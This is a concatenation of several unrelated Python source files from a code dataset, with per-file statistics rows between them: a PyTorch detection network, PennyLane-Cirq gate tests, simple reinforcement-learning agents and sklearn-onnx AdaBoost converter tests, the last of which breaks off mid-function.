nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv4
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(256, 128, 1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv5
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 256, 1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 256, 1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv6
nn.Conv2d(512, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, 512, 1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, 512, 1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
# detection
nn.Conv2d(1024, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, self.num_anchors * (5 + self.num_classes), 1),
# nn.Conv2d(1024, self.num_anchors * 5 + self.num_classes, 1),
nn.BatchNorm2d(self.num_anchors * (5 + self.num_classes)),
# nn.BatchNorm2d(self.num_anchors * 5 + self.num_classes),
# nn.LeakyReLU(0.1, inplace=True),
nn.Sigmoid()
)
def forward(self, x):
out = self.conv_layers(x)
# print(out.size())
out = out.view(out.size()[0], -1)
# print(out.size())
# out = out.reshape(-1, self.S, self.S, self.num_anchors * 5 + self.num_classes)
out = out.reshape(-1, self.S, self.S, self.num_anchors, 5 + self.num_classes)
return out
| 34.675676 | 88 | 0.510262 | 485 | 3,849 | 3.991753 | 0.115464 | 0.090909 | 0.15186 | 0.141012 | 0.831612 | 0.80062 | 0.80062 | 0.788223 | 0.788223 | 0.788223 | 0 | 0.137917 | 0.346324 | 3,849 | 110 | 89 | 34.990909 | 0.631558 | 0.090933 | 0 | 0.731707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.012195 | 0 | 0.060976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86ff4a4db5d86567e5358bc3ab8e8708410011fe | 17,764 | py | Python | tests/test_apply.py | PyJedi/pennylane-cirq | 228a083965704271fa163a1cd7c4d4b234027f0f | [
"Apache-2.0"
] | null | null | null | tests/test_apply.py | PyJedi/pennylane-cirq | 228a083965704271fa163a1cd7c4d4b234027f0f | [
"Apache-2.0"
] | null | null | null | tests/test_apply.py | PyJedi/pennylane-cirq | 228a083965704271fa163a1cd7c4d4b234027f0f | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that application of operations works correctly in the plugin devices"""
import pytest
import numpy as np
import pennylane as qml
from pennylane_cirq import SimulatorDevice, MixedStateSimulatorDevice
from scipy.linalg import block_diag
from conftest import U, U2, A
from contextlib import contextmanager
np.random.seed(42)


# ==========================================================
# Some useful global variables

# non-parametrized qubit gates
I = np.identity(2)
X = np.array([[0, 1], [1, 0]])
Y = np.array([[0, -1j], [1j, 0]])
Z = np.array([[1, 0], [0, -1]])
H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)
S = np.diag([1, 1j])
T = np.diag([1, np.exp(1j * np.pi / 4)])
SWAP = np.array([[1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]])
CNOT = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]])
CZ = np.diag([1, 1, 1, -1])

# Toffoli: identity, except the |110>/|111> block which is flipped (X)
toffoli = np.diag([1] * 8)
toffoli[6:8, 6:8] = np.array([[0, 1], [1, 0]])

# controlled-SWAP: identity on the |00>/|01> control subspaces, SWAP otherwise
CSWAP = block_diag(I, I, SWAP)


# parametrized qubit gates, written as plain functions rather than
# lambda assignments (PEP 8 / flake8 E731)
def phase_shift(phi):
    """Single-qubit phase shift diag(1, e^{i*phi})."""
    return np.array([[1, 0], [0, np.exp(1j * phi)]])


def rx(theta):
    """Rotation by ``theta`` about the Pauli-X axis."""
    return np.cos(theta / 2) * I + 1j * np.sin(-theta / 2) * X


def ry(theta):
    """Rotation by ``theta`` about the Pauli-Y axis."""
    return np.cos(theta / 2) * I + 1j * np.sin(-theta / 2) * Y


def rz(theta):
    """Rotation by ``theta`` about the Pauli-Z axis."""
    return np.cos(theta / 2) * I + 1j * np.sin(-theta / 2) * Z


def rot(a, b, c):
    """Arbitrary one-qubit rotation Rz(c) Ry(b) Rz(a) (PennyLane ``Rot``)."""
    return rz(c) @ (ry(b) @ rz(a))


def crz(theta):
    """Controlled-RZ: applies RZ(theta) to the target when the control is |1>."""
    return np.array(
        [
            [1, 0, 0, 0],
            [0, 1, 0, 0],
            [0, 0, np.exp(-1j * theta / 2), 0],
            [0, 0, 0, np.exp(1j * theta / 2)],
        ]
    )


# list of all non-parametrized single-qubit gates,
# along with the PennyLane operation name
single_qubit = [
    ("PauliX", X),
    ("PauliY", Y),
    ("PauliZ", Z),
    ("Hadamard", H),
    ("S", S),
    ("T", T),
]

# list of all parametrized single-qubit gates
single_qubit_param = [("PhaseShift", phase_shift), ("RX", rx), ("RY", ry), ("RZ", rz)]

# list of all non-parametrized two-qubit gates
two_qubit = [("CNOT", CNOT), ("SWAP", SWAP), ("CZ", CZ)]

# list of all parametrized two-qubit gates
two_qubit_param = [("CRZ", crz)]

# list of all three-qubit gates
three_qubit = [("Toffoli", toffoli), ("CSWAP", CSWAP)]
@contextmanager
def mimic_execution_for_apply(device):
    """Prepare ``device`` for a bare ``apply`` call.

    Resets the device and enters its execution context before yielding,
    mimicking the setup that a full circuit execution would perform.
    """
    device.reset()
    execution_context = device.execution_context()
    with execution_context:
        yield
@pytest.mark.parametrize("shots,analytic", [(1000, True)])
class TestApplyPureState:
    """Test application of PennyLane operations on the pure state simulator."""

    def test_basis_state(self, analytic, shots, tol):
        """Test basis state initialization"""
        dev = SimulatorDevice(4, analytic=analytic, shots=shots)
        state = np.array([0, 0, 1, 0])
        with mimic_execution_for_apply(dev):
            dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
        res = dev._state
        # expected state vector has a single 1 at the index encoded by the
        # bitstring (big-endian wire ordering via ravel_multi_index)
        expected = np.zeros([2 ** 4])
        expected[np.ravel_multi_index(state, [2] * 4)] = 1
        assert np.allclose(res, expected, **tol)

    def test_identity_basis_state(self, analytic, shots, tol):
        """Test basis state initialization if identity"""
        dev = SimulatorDevice(4, analytic=analytic, shots=shots)
        state = np.array([1, 0, 0, 0])
        with mimic_execution_for_apply(dev):
            dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
        res = dev._state
        expected = np.zeros([2 ** 4])
        expected[np.ravel_multi_index(state, [2] * 4)] = 1
        assert np.allclose(res, expected, **tol)

    def test_qubit_state_vector(self, init_state, analytic, shots, tol):
        """Test state preparation via QubitStateVector"""
        dev = SimulatorDevice(1, analytic=analytic, shots=shots)
        state = init_state(1)
        with mimic_execution_for_apply(dev):
            dev.apply([qml.QubitStateVector(state, wires=[0])])
        res = dev._state
        # preparing |psi> should leave the device state equal to |psi>
        expected = state
        assert np.allclose(res, expected, **tol)

    def test_invalid_qubit_state_vector(self, analytic, shots):
        """Test that an exception is raised if the state
        vector is the wrong size"""
        dev = SimulatorDevice(2, analytic=analytic, shots=shots)
        # only 2 amplitudes supplied for a 2-qubit (4-amplitude) device
        state = np.array([0, 123.432])
        with pytest.raises(
            qml.DeviceError,
            match=r"For QubitStateVector, the state has to be specified for the correct number of qubits",
        ):
            with mimic_execution_for_apply(dev):
                dev.apply([qml.QubitStateVector(state, wires=[0, 1])])

    @pytest.mark.parametrize("name,mat", single_qubit)
    def test_single_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
        """Test application of single qubit gates without parameters"""
        dev = SimulatorDevice(1, analytic=analytic, shots=shots)
        state = init_state(1)
        with mimic_execution_for_apply(dev):
            dev.apply(
                [qml.QubitStateVector(state, wires=[0]), qml.__getattribute__(name)(wires=[0]),]
            )
        res = dev._state
        # compare against direct matrix-vector multiplication
        expected = mat @ state
        assert np.allclose(res, expected, **tol)

    @pytest.mark.parametrize("theta", [0.5432, -0.232])
    @pytest.mark.parametrize("name,func", single_qubit_param)
    def test_single_qubit_parameters(self, init_state, analytic, shots, name, func, theta, tol):
        """Test application of single qubit gates with parameters"""
        dev = SimulatorDevice(1, analytic=analytic, shots=shots)
        state = init_state(1)
        with mimic_execution_for_apply(dev):
            dev.apply(
                [
                    qml.QubitStateVector(state, wires=[0]),
                    qml.__getattribute__(name)(theta, wires=[0]),
                ]
            )
        res = dev._state
        expected = func(theta) @ state
        assert np.allclose(res, expected, **tol)

    def test_rotation(self, init_state, analytic, shots, tol):
        """Test three axis rotation gate"""
        dev = SimulatorDevice(1, analytic=analytic, shots=shots)
        state = init_state(1)
        a = 0.542
        b = 1.3432
        c = -0.654
        with mimic_execution_for_apply(dev):
            dev.apply([qml.QubitStateVector(state, wires=[0]), qml.Rot(a, b, c, wires=[0])])
        res = dev._state
        # rot(a, b, c) = Rz(c) Ry(b) Rz(a), matching qml.Rot
        expected = rot(a, b, c) @ state
        assert np.allclose(res, expected, **tol)

    @pytest.mark.parametrize("name,mat", two_qubit)
    def test_two_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
        """Test application of two qubit gates without parameters"""
        dev = SimulatorDevice(2, analytic=analytic, shots=shots)
        state = init_state(2)
        with mimic_execution_for_apply(dev):
            dev.apply(
                [
                    qml.QubitStateVector(state, wires=[0, 1]),
                    qml.__getattribute__(name)(wires=[0, 1]),
                ]
            )
        res = dev._state
        expected = mat @ state
        assert np.allclose(res, expected, **tol)

    @pytest.mark.parametrize("mat", [U, U2])
    def test_qubit_unitary(self, init_state, analytic, shots, mat, tol):
        """Test application of arbitrary qubit unitaries (QubitUnitary)"""
        # number of qubits is inferred from the unitary's dimension
        N = int(np.log2(len(mat)))
        dev = SimulatorDevice(N, analytic=analytic, shots=shots)
        state = init_state(N)
        with mimic_execution_for_apply(dev):
            dev.apply(
                [
                    qml.QubitStateVector(state, wires=list(range(N))),
                    qml.QubitUnitary(mat, wires=list(range(N))),
                ]
            )
        res = dev._state
        expected = mat @ state
        assert np.allclose(res, expected, **tol)

    def test_invalid_qubit_state_unitary(self, analytic, shots):
        """Test that an exception is raised if the
        unitary matrix is the wrong size"""
        dev = SimulatorDevice(2, analytic=analytic, shots=shots)
        # 2x2 matrix on 2 wires (and not unitary in any case)
        state = np.array([[0, 123.432], [-0.432, 023.4]])
        with pytest.raises(ValueError, match=r"Not a unitary matrix"):
            with mimic_execution_for_apply(dev):
                dev.apply([qml.QubitUnitary(state, wires=[0, 1])])

    @pytest.mark.parametrize("name, mat", three_qubit)
    def test_three_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
        """Test application of three qubit gates without parameters"""
        dev = SimulatorDevice(3, analytic=analytic, shots=shots)
        state = init_state(3)
        with mimic_execution_for_apply(dev):
            dev.apply(
                [
                    qml.QubitStateVector(state, wires=[0, 1, 2]),
                    qml.__getattribute__(name)(wires=[0, 1, 2]),
                ]
            )
        res = dev._state
        expected = mat @ state
        assert np.allclose(res, expected, **tol)

    @pytest.mark.parametrize("theta", [0.5432, -0.232])
    @pytest.mark.parametrize("name,func", two_qubit_param)
    def test_two_qubits_parameters(self, init_state, analytic, shots, name, func, theta, tol):
        """Test application of two qubit gates with parameters"""
        dev = SimulatorDevice(2, analytic=analytic, shots=shots)
        state = init_state(2)
        with mimic_execution_for_apply(dev):
            dev.apply(
                [
                    qml.QubitStateVector(state, wires=[0, 1]),
                    qml.__getattribute__(name)(theta, wires=[0, 1]),
                ]
            )
        res = dev._state
        expected = func(theta) @ state
        assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("shots,analytic", [(1000, True)])
class TestApplyMixedState:
"""Test application of PennyLane operations on the mixed state simulator."""
def test_basis_state(self, analytic, shots, tol):
"""Test basis state initialization"""
dev = MixedStateSimulatorDevice(4, analytic=analytic, shots=shots)
state = np.array([0, 0, 1, 0])
with mimic_execution_for_apply(dev):
dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
res = dev._state
expected = np.zeros([16])
expected[np.ravel_multi_index(state, [2] * 4)] = 1
expected = np.kron(expected, expected.conj()).reshape([2 ** 4, 2 ** 4])
assert np.allclose(res, expected, **tol)
def test_identity_basis_state(self, analytic, shots, tol):
"""Test basis state initialization if identity"""
dev = MixedStateSimulatorDevice(4, analytic=analytic, shots=shots)
state = np.array([1, 0, 0, 0])
with mimic_execution_for_apply(dev):
dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
res = dev._state
expected = np.zeros([16])
expected[np.ravel_multi_index(state, [2] * 4)] = 1
expected = np.kron(expected, expected.conj()).reshape([16, 16])
assert np.allclose(res, expected, **tol)
def test_qubit_state_vector(self, init_state, analytic, shots, tol):
"""Test PauliX application"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0])])
res = dev._state
expected = state
expected = np.kron(state, state.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
def test_invalid_qubit_state_vector(self, analytic, shots):
"""Test that an exception is raised if the state
vector is the wrong size"""
dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
state = np.array([0, 123.432])
with pytest.raises(
qml.DeviceError,
match=r"For QubitStateVector, the state has to be specified for the correct number of qubits",
):
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0, 1])])
@pytest.mark.parametrize("name,mat", single_qubit)
def test_single_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
"""Test application of single qubit gates without parameters"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply(
[qml.QubitStateVector(state, wires=[0]), qml.__getattribute__(name)(wires=[0]),]
)
res = dev._state
expected = mat @ state
expected = np.kron(expected, expected.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("theta", [0.5432, -0.232])
@pytest.mark.parametrize("name,func", single_qubit_param)
def test_single_qubit_parameters(self, init_state, analytic, shots, name, func, theta, tol):
"""Test application of single qubit gates with parameters"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0]),
qml.__getattribute__(name)(theta, wires=[0]),
]
)
res = dev._state
expected = func(theta) @ state
expected = np.kron(expected, expected.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
def test_rotation(self, init_state, analytic, shots, tol):
"""Test three axis rotation gate"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
a = 0.542
b = 1.3432
c = -0.654
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0]), qml.Rot(a, b, c, wires=[0])])
res = dev._state
expected = rot(a, b, c) @ state
expected = np.kron(expected, expected.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
    @pytest.mark.parametrize("name,mat", two_qubit)
    def test_two_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
        """Test application of two qubit gates without parameters"""
        dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
        state = init_state(2)
        with mimic_execution_for_apply(dev):
            dev.apply(
                [
                    qml.QubitStateVector(state, wires=[0, 1]),
                    qml.__getattribute__(name)(wires=[0, 1]),
                ]
            )
        res = dev._state
        # expected density matrix: (U|psi>)(U|psi>)^dagger as a 4x4 array
        expected = mat @ state
        expected = np.kron(expected, expected.conj()).reshape([4, 4])
        assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("mat", [U, U2])
def test_qubit_unitary(self, init_state, analytic, shots, mat, tol):
N = int(np.log2(len(mat)))
dev = MixedStateSimulatorDevice(N, analytic=analytic, shots=shots)
state = init_state(N)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=list(range(N))),
qml.QubitUnitary(mat, wires=list(range(N))),
]
)
res = dev._state
expected = mat @ state
expected = np.kron(expected, expected.conj()).reshape([2 ** N, 2 ** N])
assert np.allclose(res, expected, **tol)
def test_invalid_qubit_state_unitary(self, analytic, shots):
"""Test that an exception is raised if the
unitary matrix is the wrong size"""
dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
state = np.array([[0, 123.432], [-0.432, 023.4]])
with pytest.raises(ValueError, match=r"Not a unitary matrix"):
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitUnitary(state, wires=[0, 1])])
@pytest.mark.parametrize("name, mat", three_qubit)
def test_three_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
dev = MixedStateSimulatorDevice(3, analytic=analytic, shots=shots)
state = init_state(3)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1, 2]),
qml.__getattribute__(name)(wires=[0, 1, 2]),
]
)
res = dev._state
expected = mat @ state
expected = np.kron(expected, expected.conj()).reshape([8, 8])
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("theta", [0.5432, -0.232])
@pytest.mark.parametrize("name,func", two_qubit_param)
def test_two_qubits_parameters(self, init_state, analytic, shots, name, func, theta, tol):
"""Test application of single qubit gates with parameters"""
dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
state = init_state(2)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1]),
qml.__getattribute__(name)(theta, wires=[0, 1]),
]
)
res = dev._state
expected = func(theta) @ state
expected = np.kron(expected, expected.conj()).reshape([4, 4])
assert np.allclose(res, expected, **tol)
| 37.16318 | 106 | 0.599415 | 2,239 | 17,764 | 4.632425 | 0.106297 | 0.060162 | 0.040976 | 0.053027 | 0.85027 | 0.844196 | 0.833398 | 0.82472 | 0.817586 | 0.814211 | 0 | 0.029936 | 0.264749 | 17,764 | 477 | 107 | 37.24109 | 0.764183 | 0.118554 | 0 | 0.721068 | 0 | 0 | 0.026919 | 0 | 0 | 0 | 0 | 0 | 0.059347 | 1 | 0.074184 | false | 0 | 0.020772 | 0 | 0.10089 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
810740ed3447def9a7c885db02ee8c9a7ec35487 | 233 | py | Python | unbalanced_dataset/ensemble/tests/test_easy_ensemble.py | kmike/UnbalancedDataset | 777f26cee73c04ae2f3d59e43c990cbfd1725b23 | [
"MIT"
] | 6 | 2016-06-02T09:27:41.000Z | 2021-04-21T06:46:12.000Z | unbalanced_dataset/ensemble/tests/test_easy_ensemble.py | kmike/UnbalancedDataset | 777f26cee73c04ae2f3d59e43c990cbfd1725b23 | [
"MIT"
] | null | null | null | unbalanced_dataset/ensemble/tests/test_easy_ensemble.py | kmike/UnbalancedDataset | 777f26cee73c04ae2f3d59e43c990cbfd1725b23 | [
"MIT"
] | 1 | 2018-08-25T03:11:05.000Z | 2018-08-25T03:11:05.000Z | """Test the module easy ensemble."""
from __future__ import print_function
from unbalanced_dataset.ensemble import EasyEnsemble
def test_easy_ensemble():
"""Test the easy ensemble function."""
print('Test Easy Ensemble')
| 21.181818 | 52 | 0.755365 | 29 | 233 | 5.793103 | 0.482759 | 0.285714 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150215 | 233 | 10 | 53 | 23.3 | 0.848485 | 0.270386 | 0 | 0 | 0 | 0 | 0.113208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
811d088cb925985eeeb216526d5f32c94bf7d0eb | 2,659 | py | Python | infinite_horizon_off_policy_estimation/sumo/Easy_agent.py | marued/RL-dualDICE | 4683106679448d258ee4e4137e5f99454c7e3539 | [
"Apache-2.0"
] | null | null | null | infinite_horizon_off_policy_estimation/sumo/Easy_agent.py | marued/RL-dualDICE | 4683106679448d258ee4e4137e5f99454c7e3539 | [
"Apache-2.0"
] | null | null | null | infinite_horizon_off_policy_estimation/sumo/Easy_agent.py | marued/RL-dualDICE | 4683106679448d258ee4e4137e5f99454c7e3539 | [
"Apache-2.0"
] | 1 | 2020-09-20T20:18:03.000Z | 2020-09-20T20:18:03.000Z | import numpy as np
def softmax(x, alpha, beta):
exp = np.exp(alpha * x + beta)
return exp/np.sum(exp)
class Simple_agent(object):
def __init__(self, action_size, alpha, epsilon = 0.04):
self.action_size = action_size
self.alpha = alpha
self.epsilon = epsilon
def get_action(self, state):
state = state.reshape(-1, 4)
'''
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
'''
action = np.zeros(self.action_size)
for i in range(self.action_size):
if np.random.rand() < self.epsilon:
action[i] = np.random.randint(4)
else:
prob = softmax(state[i,:], self.alpha, 0)
action[i] = np.random.choice(4, p = prob)
return action
def log_pi(self, state, action):
state = state.reshape(-1, 4)
'''
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
'''
log_pi_action = 0.0
for i in range(self.action_size):
prob = softmax(state[i, :], self.alpha, 0)
prob = (1-self.epsilon) * prob + self.epsilon * 0.25
log_pi_action += np.log(prob[int(action[i])])
return log_pi_action
def pi(self, state, action):
return np.exp(self.log_pi(state, action))
class Easy_agent(object):
def __init__(self, action_size, alpha, beta, gamma, epsilon = 1e-4):
self.action_size = action_size
self.alpha = alpha
self.beta = beta
self.gamma = gamma
self.epsilon = epsilon
def get_action(self, state):
state = state.reshape(-1,8)
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
action = np.zeros(self.action_size)
for i in range(self.action_size):
if np.random.rand() < self.epsilon:
action[i] = np.random.randint(4)
else:
weight_keep = state[i,4:] * self.gamma
prob = softmax(state[i,:4], self.alpha, weight_keep + self.beta)
action[i] = np.random.choice(4, p = prob)
return action
def log_pi(self, state, action):
state = state.reshape(-1,8)
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
log_pi_action = 0.0
for i in range(self.action_size):
weight_keep = state[i,4:] * self.gamma
prob = softmax(state[i, :4], self.alpha, weight_keep + self.beta)
prob = (1-self.epsilon) * prob + self.epsilon * 0.25
log_pi_action += np.log(prob[int(action[i])])
return log_pi_action
def pi(self, state, action):
return np.exp(self.log_pi(state, action))
| 28.902174 | 69 | 0.630688 | 462 | 2,659 | 3.534632 | 0.114719 | 0.09553 | 0.102878 | 0.053889 | 0.913656 | 0.913656 | 0.913656 | 0.880588 | 0.835273 | 0.786283 | 0 | 0.03671 | 0.190673 | 2,659 | 91 | 70 | 29.21978 | 0.722119 | 0 | 0 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.132353 | false | 0 | 0.014706 | 0.029412 | 0.279412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4b17bf799478b77f9109ee830bab76e50fe070a | 14,816 | py | Python | tests/test_sklearn_adaboost_converter.py | Alexsandruss/sklearn-onnx | b612557615df439e471867a676c9eca8ae4a787c | [
"Apache-2.0"
] | null | null | null | tests/test_sklearn_adaboost_converter.py | Alexsandruss/sklearn-onnx | b612557615df439e471867a676c9eca8ae4a787c | [
"Apache-2.0"
] | null | null | null | tests/test_sklearn_adaboost_converter.py | Alexsandruss/sklearn-onnx | b612557615df439e471867a676c9eca8ae4a787c | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
import unittest
from distutils.version import StrictVersion
import onnx
from onnx.defs import onnx_opset_version
import onnxruntime
from sklearn.ensemble import AdaBoostClassifier, AdaBoostRegressor
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import (
BooleanTensorType,
FloatTensorType,
Int64TensorType,
)
from skl2onnx.common.data_types import onnx_built_with_ml
from test_utils import (
dump_data_and_model,
fit_classification_model,
fit_regression_model,
TARGET_OPSET
)
class TestSklearnAdaBoostModels(unittest.TestCase):
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_r(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=10, algorithm="SAMME.R", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=2, random_state=42)), 3)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMER",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_r_decision_function(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=10, algorithm="SAMME.R", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=2, random_state=42)), 4)
options = {id(model): {'raw_scores': True}}
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10,
options=options,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMERDecisionFunction",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
methods=['predict', 'decision_function'],
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_r_logreg(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=5, algorithm="SAMME.R",
base_estimator=LogisticRegression(
solver='liblinear')), 4)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMERLogReg",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme(self):
